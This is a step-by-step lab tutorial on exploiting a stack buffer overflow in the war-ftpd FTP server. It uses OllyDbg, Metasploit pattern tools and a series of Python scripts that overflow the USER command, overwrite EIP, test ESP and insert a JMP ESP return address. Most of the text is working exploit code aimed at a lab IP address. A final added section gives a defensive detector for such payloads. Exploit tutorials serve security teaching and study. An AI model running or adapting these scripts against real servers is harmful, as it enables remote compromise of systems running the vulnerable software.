Open war-ftpd, and once it has opened click Go Online.
Open OllyDbg, click the File menu, select Attach, choose the running war-ftp process, and click the play button.
Log in to the BackTrack console and create a fuzzer as fuzzer.py.
Write the script below into the fuzzer:
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer= "\x41" * 1000
s.connect (('192.168.56.101',21))
data=s.recv (1024)
print ("Sending evil data via USER command...")
s.send ('USER '+buffer+'\r\n')
data=s.recv (1024)
s.send ('PASS PASSWORD'+'\r\n')
s.close()
print ("Finish")
After writing the script above, run this command. This command is to ascertain whether war-ftp is actually running.
After that, type the command.
After doing the fuzzing process, look at what happens in war-ftp, and whether an error message appears.
As for how: once inside the Metasploit Framework, type the following command to generate 1000 bytes of pattern data, which is saved into a file string_pattern.txt as shown in the picture below.
This is the contents of string_pattern.txt.
After the step above, the next step is to put this data into the fuzzer application that was made previously. The data pattern will replace the "A" characters in the fuzzer.
Unlike the previous figure, the current register values in the memory of the warFTP server application have now been overwritten with the string pattern that was put into the fuzzer application.
Having managed to crash the application using the existing pattern data, the next step is to find at which byte of the string the existing registers are overwritten. To do so, use the pattern_offset.rb tool.
The next step is to customize the fuzzer application by changing the existing buffer variable and adding an EIP-value variable inside it. For more details see the following script.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP = "\x90" * 485
nilaiEIP+= "\xEF\xBE\xAD\xDE"
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$
#buffer= "\x41" * 1000
s.connect (('192.168.56.101',21))
data=s.recv (1024)
print ("Sending evil data via USER command...")
s.send ('USER '+nilaiEIP+'\r\n')
#s.send ('USER '+buffer+'\r\n')
data=s.recv (1024)
s.send ('PASS PASSWORD'+'\r\n')
s.close()
print ("Finish")
It is apparent that the value in the EIP register has been changed to DEADBEEF. Next is to try writing to ESP, the stack pointer, which points to a temporary data storage area in memory. To test this, the existing fuzzer application is customized again; for more details see the script below:
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000-len(buffer))
#nilaiEIP = "\x90" * 485
#nilaiEIP+= "\xEF\xBE\xAD\xDE"
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$
#buffer= "\x41" * 1000
s.connect (('192.168.56.101',21))
data=s.recv (1024)
#print ("Sending evil data via USER command...")
#s.send ('USER '+nilaiEIP+'\r\n')
s.send ('USER '+buffer+'\r\n')
data=s.recv (1024)
s.send ('PASS PASSWORD'+'\r\n')
s.close()
#print ("Finish")
Next, search for a JMP ESP in the memory of the loaded application, with the following steps: in the OllyDbg application, choose the View menu and then select Executable Modules. In this case what emerges is 7CA58265 FFE4 JMP ESP. Before adding the JMP ESP address to the fuzzer script, the first thing to do is convert the address into little-endian format, so 7CA58265 becomes \x65\x82\xA5\x7C.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\x65\x82\xA5\x7C"
buffer+= "\xCC" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
#nilaiEIP = "\x90" * 485
#nilaiEIP+= "\xEF\xBE\xAD\xDE"
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad$
#buffer= "\x41" * 1000
s.connect (('192.168.56.101',21))
data=s.recv (1024)
#print ("Sending evil data via USER command...")
#s.send ('USER '+nilaiEIP+'\r\n')
s.send ('USER '+buffer+'\r\n')
data=s.recv (1024)
s.send ('PASS PASSWORD'+'\r\n')
s.close()
#print ("Finish")
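From the defender's side, the same three payload shapes are easy to spot on the FTP control channel. The check below is an added example, not code from the original post: it splits each command line into verb and argument and flags oversized arguments, non-printable bytes and 0x90 NOP runs. The 64-byte threshold and the sample session are assumptions constructed for the example.

```python
#!/usr/bin/env python3
"""Flag FTP control-channel commands shaped like the fuzzer payloads above."""
import re

# Assumed threshold: real usernames are short; the fuzzer sends 1000 bytes.
MAX_ARG_LEN = 64
# A run of 16 or more 0x90 (x86 NOP) bytes, as used for padding in the scripts above.
NOP_SLED_RE = re.compile(rb"\x90{16,}")
# Commands whose argument a client controls freely.
WATCHED_VERBS = (b"USER", b"PASS", b"CWD", b"RETR", b"MKD")


def analyse_command(raw: bytes) -> dict:
    """Split one FTP command line and list why its argument looks suspicious."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    verb = verb.upper()
    reasons = []
    if verb in WATCHED_VERBS and len(arg) > MAX_ARG_LEN:
        reasons.append("oversized argument (%d bytes)" % len(arg))
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes in argument")
    if NOP_SLED_RE.search(arg):
        reasons.append("NOP sled (0x90 run)")
    return {"verb": verb.decode("ascii", "replace"),
            "arg_len": len(arg), "reasons": reasons}


def scan_session(commands: list) -> list:
    """Return (index, analysis) for every command with at least one reason."""
    hits = []
    for i, raw in enumerate(commands):
        result = analyse_command(raw)
        if result["reasons"]:
            hits.append((i, result))
    return hits


# Constructed sample session: a normal login, then the shapes the scripts send.
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",                                  # first fuzzer
    b"USER " + b"\x90" * 485 + b"\xEF\xBE\xAD\xDE" + b"\xCC" * 511 + b"\r\n",  # ESP test
    b"PASS PASSWORD\r\n",
]

if __name__ == "__main__":
    for idx, a in scan_session(SAMPLE_SESSION):
        print("command %d: %s len=%d -> %s"
              % (idx, a["verb"], a["arg_len"], "; ".join(a["reasons"])))
```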